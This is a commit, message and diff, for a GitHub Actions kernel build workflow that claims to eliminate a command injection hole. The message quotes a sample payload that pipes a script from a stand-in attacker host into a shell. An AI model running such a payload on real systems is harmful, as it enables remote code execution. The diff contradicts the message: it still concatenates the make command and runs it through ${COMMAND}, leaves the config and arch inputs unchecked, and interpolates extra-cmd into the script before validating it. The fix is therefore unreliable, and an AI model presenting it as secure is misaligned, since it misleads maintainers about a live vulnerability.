[SECURITY]action: fix(extra command): prevent command injection in kernel build workflow
The kernel build workflow previously constructed a shell command string
via string concatenation and executed it using `${COMMAND}`, which is
equivalent to `eval "$COMMAND"`. Since the command included untrusted
inputs such as `inputs.extra-cmd`, `inputs.config`, and `inputs.arch`,
this created a critical remote command injection vulnerability.

An attacker controlling workflow inputs (e.g., via a malicious pull
request) could inject arbitrary shell commands by supplying payloads
like:
  extra-cmd: '; curl http://evil.com/sh | sh #'

This commit eliminates the dynamic command string entirely and replaces
it with a secure parameterized invocation of `make`.

Key changes:
- Remove unsafe `COMMAND="..."` construction and `${COMMAND}` execution.
- Introduce strict allowlist validation for `extra-cmd`: only alphanumeric
  characters, underscores, equals, plus, dots, slashes, commas, hyphens,
  and spaces are permitted. This covers common make targets and variable
  assignments (e.g., `modules Image.gz KCFLAGS=-g`).
- Safely split `extra-cmd` into a Bash array using `read -r -a` to avoid
  shell re-parsing.
- Pass all arguments directly to `make` as positional parameters, ensuring
  they are treated as data—not executable code.
- Retain full flexibility for legitimate kernel build use cases while
  blocking all known command injection vectors.

This mitigation follows the principle of "never concatenate untrusted
input into shell commands" and aligns with GitHub Actions security best
practices.

Fixes: critical command injection vulnerability in CI build step.

Signed-off-by: dabao1955 <dabao1955@163.com>

--- a/action.yml
+++ b/action.yml
@@ -461,8 +461,16 @@ runs:
 
         # Build the kernel
          echo "::group:: Building Kernel with selected cross compiler"
+         EXTRA_CMD="${{ inputs.extra-cmd }}"
+         if [[ -n "$EXTRA_CMD" && ! "$EXTRA_CMD" =~ ^[a-zA-Z0-9_=+./,\ -]*$ ]]; then
+             echo "::error::extra-cmd contains invalid characters. Only letters, digits, _=+./,- and spaces are allowed." >&2
+             exit 1
+         fi
+         read -r -a EXTRA_ARGS <<< "$EXTRA_CMD"
+         EXTRA_ARG="${EXTRA_ARGS[@]}"
          mkdir out -p -v
-         COMMAND="make -j$(nproc --all) ${{ inputs.config }} ARCH=${{ inputs.arch }} all ${{ inputs.extra-cmd }} O=out"
+
+         COMMAND="make -j$(nproc --all) ${{ inputs.config }} ARCH=${{ inputs.arch }} all $EXTRA_ARG O=out"
 
          if [ -d "$HOME/clang/bin" ]; then
               CMD_PATH="$HOME/clang/bin"
@@ -518,9 +526,10 @@ runs:
 
          # run the command
          ${COMMAND}
+
          echo "::endgroup::"
 
-         unset CMD_PATH CMD_CC CMD_CLANG_TRIPLE CMD_CROSS_COMPILE CMD_CROSS_COMPILE_ARM32 USE_CCACHE CLANG_TRIPLE CROSS_COMPILE_ARM32 CROSS_COMPILE CLANG_PATH HOMES KVER COMMAND SWAP_FILE SUBLEVEL PATCHLEVEL VERSION GCC_DIR FILE FILE_NAME MATCHED_DIR FOLDER FOLDER_NAME GCC64 GCC32 NEED_GCC AOSP_CLANG_URL OTHER_CLANG_URL AOSP_GCC64_URL AOSP_GCC32_URL AOSP_GCC_BRANCH OTHER_GCC64_URL OTHER_GCC32_URL
+         unset CMD_PATH CMD_CC CMD_CLANG_TRIPLE CMD_CROSS_COMPILE CMD_CROSS_COMPILE_ARM32 USE_CCACHE CLANG_TRIPLE CROSS_COMPILE_ARM32 CROSS_COMPILE CLANG_PATH HOMES KVER COMMAND SWAP_FILE SUBLEVEL PATCHLEVEL VERSION GCC_DIR FILE FILE_NAME MATCHED_DIR FOLDER FOLDER_NAME GCC64 GCC32 NEED_GCC AOSP_CLANG_URL OTHER_CLANG_URL AOSP_GCC64_URL AOSP_GCC32_URL AOSP_GCC_BRANCH OTHER_GCC64_URL OTHER_GCC32_URL EXTRA_CMD
 
         # Package the kernel output
         if [ "${{ inputs.anykernel3 }}" == "false" ]; then
